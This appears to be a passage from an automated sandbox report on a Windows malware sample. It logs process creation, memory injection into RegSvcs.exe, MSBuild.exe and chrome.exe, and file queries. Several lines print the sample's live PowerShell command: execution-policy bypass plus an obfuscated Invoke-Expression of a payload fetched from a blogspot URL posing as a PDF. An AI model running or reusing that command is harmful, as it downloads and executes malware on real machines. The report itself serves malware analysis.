            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\System32\svchost.exeSection loaded: NULL target: C:\Program Files\Google\Chrome\Application\chrome.exe protection: execute and read and write
            Source: C:\Windows\System32\svchost.exeThread APC queued: target process: C:\Program Files\Google\Chrome\Application\chrome.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 542000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 54A000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: E60008
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 542000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 54A000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: F2C008
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 402000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 542000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 54A000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 992008
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 402000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 542000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 54A000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: EC2008
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 402000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 542000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 54A000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 901008
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 402000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 542000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 54A000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: ABB008
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\dllhost.exe "C:\Windows\System32\dllhost.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 940
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 936
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 680
            Source: C:\Windows\SysWOW64\dllhost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;& ('{1}{0}' -f 'ex', 'i') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);start-sleep -seconds 6;
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;& ('{1}{0}' -f 'ex', 'i') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);start-sleep -seconds 6;
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.3208.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
